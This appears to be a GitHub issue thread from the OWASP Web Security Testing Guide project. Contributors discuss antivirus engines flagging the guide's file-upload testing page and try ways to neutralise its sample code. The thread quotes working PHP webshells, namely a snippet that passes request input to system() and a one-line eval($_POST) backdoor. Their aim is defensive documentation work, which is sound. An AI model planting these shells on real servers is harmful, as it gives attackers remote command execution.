Comments (12)
Very few AVs on VirusTotal also flag it: https://www.virustotal.com/gui/file-analysis/ZDdiYWFlMTM1YmEyYWQyNDkzM2ZiNTE3N2Y3MjVlNjg6MTU2MzQwOTE3Ng==/detection
https://www.virustotal.com/gui/file/2c38b233b56f2e566c90c32315335dab1fca9e0fbd64323a0666efcddd912d4f/detection
There's a good possibility that overzealous web browser protection or corporate proxies would also mark the samples as malware. (The resource hogging types that also install their root certificate to decrypt TLSv1.2.)
We could obvuscate the samples like this?
<?php
if(isset($CENSORED)){
echo "<pre>";
$cmd = ($CENSORED);
system($cmd);
echo "</pre>";
die;
}
?>
Replace $CENSORED with $_REQUEST['cmd']
Transforms (base64 encoding, nonprintable character or similar) won't help either, because AV can detect that (I know by experience when someone imported a "font" that had real malware in it...). Also other AV like triggering on anything that looks like obvuscation.
from wstg.
We can create a list of system commands that can be run, and put in there the variable of that list, which should appear to be safe. What do you think?
from wstg.
Yup I noticed that the other day too. The content in question does include benign source code for an example web backdoor.
from wstg.
Feel free to review the content on GitHub and understand the reason it is a False Positive from defender.
(It’s a markdown file, the code isn’t executed unless you extract the snippet and place it on (or in) an appropriately configured execution environment.)
from wstg.
Fair enough, but if this is a false positive then it should be explicitly mentioned that one would be generated since it is impossible to determine if the code snippet is what is being detected or if the file itself has been truly been altered to include a virus.
It would be a clever trick for an actual hacker to infect a file that would be easily dismissed as a false positive.
from wstg.
Yup, just trying to give you options until it can be addressed somehow.
from wstg.
I like the idea of using $CENSORED as suggested, however, I need to review the content/context. We might be able to link elsewhere for code/samples ... or use a pseudo code block instead of real code.
from wstg.
I can confirm that my own Windows Defender only flags the following file:
OWASP-Testing-Guide-v5\document\4 Web Application Security Testing\4.11 Business Logic Testing\4.11.9 Test Upload of Malicious Files (OTG-BUSLOGIC-009).md
We can therefore try different combinations of "censoring" or obfuscating such that the code sample isn't functional without modification.
I haven't tried a full exploit, but I definitely can see why the AV would flag it... theoretically if you compromised a machine that had Git and PHP, you could theoretically get the server to execute the shellcode, similar to how you can dump shellcode into a log file or other upload and get the server to execute it. (I did that in a pentest exercise.)
I don't like the idea of linking because the thing we are linking to would be flagged by "web protection", or the linked material could simply be removed.
Hopefully the AV is only triggering on the string "REQUEST['cmd']", so maybe "REQUEST['aprogramthatisnotashellinanyos']"?
from wstg.
So much for the censored idea...
This is being detected as well
<?php
if(isset($_REQUEST['censored'])){
echo "<pre>";
$cmd = ($_REQUEST['censored']);
system($cmd);
echo "</pre>";
die;
}
?>
Now that I look at the code, it's probably because it the AV doesn't like a PHP with system( [something that can execute] ). I'll try swapping "system" for a censoring term.
from wstg.
Hmm pesky bugger... it also doesn't like
<?php @eval($_POST['password']);?>
from wstg.
I removed one of the three engine detections when I replaced system and eval with CENSORED, but unfortunately Windows Defender still calls it out, as Yorcirekrikseng instead of Chopper.
I'm going to assume some malware actually base64 encodes or otherwise obvuscates the "system" and "eval" in case dumber systems try to filter it out of uploads, so Defender is using a different pattern.
from wstg.
The pull request is for specifically the issue mentioned, which is Windows Defender (Microsoft's scanner) detecting the page as malware. Note that with the "CENSORED" strings I added, the code is no longer syntactically correct, and setting a server up to be dumb enough to execute the .md files will not result in a webshell behaviour.
from wstg.
Related Issues (20)
- Possible error in 4.4.6 Testing for Browser Cache Weaknesses HOT 6
- Possible error in 4.9.2 Testing for Padding Oracle
- Ambiguity in the summary related to the test case Testing for Bypassing Authorization Schema HOT 4
- [fix] : Typo in CONTRIBUTING.md
- [Fix] : Fix Formatting Issue in OWASP Web Security Testing Guide Document
- [fix]: Fix Formatting Issue in OWASP Web Security Testing Guide Document
- E-Book action artifact expired HOT 3
- yjh HOT 1
- fghhyg
- vbbbbbbbbbbbbbm
- jjjjjjjjjjjjjjj
- Adding "How to Test" for the WSTG Checklist [Work in Progress] HOT 17
- Adding "Test for Simultaneous sessions" in Session Management Testing HOT 2
- Provide a simplified Chinese translation version for this project HOT 1
- Cookies-Link under 4.08 #cookies points to itself HOT 1
- Invisible code parts - bright blue text on the blue background HOT 6
- Check List Translation to french and arabic HOT 3
- Update Privilege Escalation's Weak SessionID Section
- Juice Shop - Error Handling link not found HOT 1
- Grammar error HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from wstg.